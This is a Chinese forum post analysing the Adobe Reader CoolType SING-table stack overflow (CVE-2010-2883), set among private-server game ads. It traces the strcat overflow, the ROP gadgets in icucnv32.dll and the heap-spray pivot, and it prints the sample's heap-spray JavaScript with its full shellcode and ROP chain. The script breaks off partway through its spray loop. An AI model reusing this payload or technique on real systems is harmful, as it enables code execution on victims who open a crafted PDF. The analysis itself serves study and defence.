12558网页游戏私服论坛

 找回密码
 立即注册
游戏开服表 申请开服
游戏名称 游戏描述 开服状态 游戏福利 运营商 游戏链接
攻城掠地-仿官 全新玩法,觉醒武将,觉醒技能 每周新区 经典复古版本,长久稳定 进入游戏
巅峰新版攻 攻城掠地公益服 攻城掠地SF 新兵种、新武将(兵种) 进入游戏
攻城掠地公 散人玩家的天堂 新开 进入游戏
改版攻城掠 上线即可国战PK 稳定新区 全新改版,功能强大 进入游戏
少年江山 高福利高爆率 刚开一秒 江湖水落潜蛟龙 进入游戏
太古封魔录 开服送10亿钻石 福利多多 不用充钱也可升级 进入游戏
神魔之道 签到送元宝 稳定开新区 送豪华签到奖励 进入游戏
神奇三国 统帅三军,招揽名将 免费玩新区 激情国战,征战四方 进入游戏
龙符 三日豪礼领到爽 天天开新区 助你征战无双 进入游戏
王者之师 免费领豪华奖励 免费玩新区 6元送6888元宝 进入游戏
三国霸业 战车-珍宝-觉醒-攻城掠地SF-全新玩法 免费玩新区 攻城掠地私服 进入游戏
手游私服盒子 各类免费游戏 0.1折送海量资源 各类手游私服 进入游戏
皇家MU2 《奇迹 2:传奇》韩国网禅公司《奇迹》正统续作。 3D锁视角Mmrpg 暗黑3+传奇+流放之路+奇迹 进入游戏
查看: 653|回复: 0

Adobe Reader栈溢出漏洞(CVE-2010-2883)漏洞分析

[复制链接]

49

主题

49

帖子

108

积分

实习版主

Rank: 7Rank: 7Rank: 7

积分
108
发表于 2020-5-18 21:52:57 | 显示全部楼层 |阅读模式
漏洞描述

CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在的栈溢出漏洞,用户受骗打开了特制的PDF就有可能导致执行任意恶意代码
测试环境

推荐使用的环境操作系统Windows XP SP3虚拟机VMware调试器OD IDA漏洞软件Adobe Reader9.3.4静态分析

定位触发点

用IDA反汇编CoolType.dll库,查看字符串可发现SING字体


分析漏洞成因

直接定位进去即可查看该库对sing表格的解析方式,主要是strcat造成的溢出漏洞


可以注意到在地址0x0803DDAB处调用了strcat函数,先来看下strcat函数原型
char *strcat(char *dest, const char *src);strcat会将参数src字符串复制到参数dest所指的字符串尾部,dest最后的结束字符NULL会被覆盖掉,并在连接后的字符串尾部再增加一个NULL
漏洞成因就是没有去验证src的长度是否可能会超出dest数组定义的长度。如果我们有可能超出dest数组定义的长度的数据放入src中有可能在后方调用strcat函数时覆盖栈区从而实现代码执行
动态调试

在复现环境中把Adobe Reader 9.3.4启动程序载入OD,加载之后按F9运行。此时OD显示当前调试程序是运行状态,实际上这个时候Adobe Reader就已经加载了CoolType.dll文件了。
通过刚刚的静态分析我们了解到SING在地址0x0803DD74处被引用,因此我们可以在OD中在这个地址处下一个断点
获取SING表的入口地址

Ctrl+G输入0x0803DD74回车跳转到该地址F2下断点

将样本(名企面试自助手册.pdf)拖入Adobe Reader中,程序就会停在刚才下的断点上面
F7单步到下面的地址

此时ecx指向0x12E404,《漏洞战争》对这条指令的解释是这里是SING表的表的入口,我们来验证一下,数据窗口跟随看看这个指针里面存放的是什么

在分析这段数据之前我们先来看看TrueType字体格式标准文档里

在TrueType字体文件中,从0字节偏移的位置开始有一个表目录。且这个表目录的第一个字段是名为sfnt version是用来表明所用ttf格式版本的字段。在文档中清楚的说明了,对于1.0版本的TTF字体文件开头要用0x00010000来表示版本。
现在回到0x2AEB710位置处的数据,

会发现开头正好是0x00010000,这就证明了ecx保存的确实是SING表的指针
继续动态调试,接下来遇到一个call指令,不妨来看看这个函数传入了哪些参数

很明显它将SING字符串当作参数了,这个call实际上是在处理SING表,这里我们直接F8步过,继续单步

此时eax为0x46949,要想知道这块数据是什么,首先用pdfStreamDumper取出PDF样本中的TTF文件。TTF中关于SING表的TableEntry结构数据,如图所示

下面是官方文档中对TableEntry结构的定义
typedef struct_SING{    char tag[4]     //标记->SING    ULONG checkSum  //校验和->0xD9BCCBB5    ULONG offset    //相对文件的偏移->011C    ULONG length    //数据长度->0x1DDF}通过观察SING表中的结构我们可以知道在文件偏移0x11C处即是SING表的真实数据,Ctrl+G去到0x11C处,发现和eax所指向的0x46949是一致的,如图:

通过确认这个eax所指向的内容我们可以推测出上面那个call的作用是取出SING表的入口地址

接着比较eax和esi的值,检测SING表是否为空

下面的je因为SING表不为空,所以不会跳转

然后这里取出eax的内容赋给ecx,通过刚才的分析我们知道此时的ecx保存的是ttf的版本号,继续往下

然后清掉低4位,结果为零,je跳转,继续往下

接着将eax加上0x10,eax原来指向SING表,SING表加上0x10处指向的是unique域,在010Editor处如图:

溢出点

继续单步就能发现溢出点

这里将uniqueName域和当前的ebp入栈,然后调用strcat进行字符串拼接,但是没有进行安全检查,导致溢出,我们单步步过strcat后查看一下ebp开始的栈区数据

此时栈溢出已经发生,函数的返回地址已经被覆盖为SING表中的恶意数据,在010Editor中如图

精心挑选的返回地址

这个地址位于icucnv32.dll中,让我们来看看这个地址有和特别之处,为什么会选择这样一个地址,用010打开icucnv32.dll

我们发现IMAGE_OPTIONAL_HEADER中的IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 的值为0,也就是说这个模块没有开启ASLR,这就保证了exploit的稳定性

继续往下分析,执行到0x0808B308时,eax的值指向0x4A80CB38,这个地址也是在icucnv32.dll中,我们F7跟进去,

这个地址是精心挑选的ROP指令,首先调整了ebp,调整之后ebp为0012E4DC

也就是将ebp调整到strcat函数调用后的栈区数据范围内,接下来执行leave,修改了esp

最后retn会跳转到0x4A82A714地址处,继续F7单步

pop esp之后,esp将被修改为0x0C0C0C0C,然后返回,此时栈的情况如图:

JavaScript实现HeapSpray

上面的0x0C0C0C0C是样本特意构造的,自然是为了实现 HeapSpary堆喷射技术,借助PDF本身支持执行JS的特性,将ShellCode借助JS写入内存中。栈中的数据即是JS代码中的ShellCode,作者利用它来实现ROP以绕过DEP保护。
这里借助PDFStreamDumper工具提取样本中这段实现堆喷射的JS代码
var var_shellcode = unescape( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%ub5ba%uda4b%udd0e%ud9c1%u2474%u5ef4%uc933%u31b1%u5631%u0313%u1356%uee83%ua949%uf22f%uac59%u0bd0%ud199%uee59%ud1a8%u7a3e%ue19a%u2e35%u8916%udb18%uffad%uecb4%ub506%uc3e2%ue697%u42d7%uf51b%ua50b%u3622%ua45e%u2b63%uf493%u273c%ue906%u7d49%u829b%u9301%u779b%u92d1%u298a%ucd6a%ucb0c%u65bf%ud305%u40dc%u68df%u3e16%ub8de%ubf67%u854d%u3248%uc18f%uad6e%u3bfa%u508d%ufffd%u8eec%u1b88%u4456%uc02a%u8967%u83ad%u666b%uccb9%u796f%u676e%uf28b%ua891%u401a%u6cb6%u1247%u35d7%uf52d%u26e8%uaa8e%u2c4c%ube22%u6ffc%u4128%u0a72%u411e%u158c%u2a0e%u9ebd%u2dc1%u7542%uc2a6%ud408%u4a8e%u8cd5%u1693%u7ae6%u2ed7%u8f65%ud4a7%ufa75%u91a2%u1631%u8ade%u18d7%uaa4d%u7afd%u3810%u529d%ub8b7%uab04' );var var_c = unescape( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );while (var_c.length + 20 + 8 < 0x10000) var_c+=var_c;var_b = var_c.substring(0, (0x0c0c-0x24)/2);var_b += var_shellcode;var_b += var_c;var_d = var_b.substring(0, 0x10000/2);while(var_d.length < 0x80000) var_d += var_d;var_3 = var_d.substring(0, 0x80000 - (0x1020-0x08) / 2);var var_4 = new Array();for (var_i=0;var_i

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
楼主热帖
回复

使用道具 举报

*滑块验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|12558网页游戏私服论坛 |网站地图

GMT+8, 2024-11-25 09:41 , Processed in 0.093750 second(s), 32 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表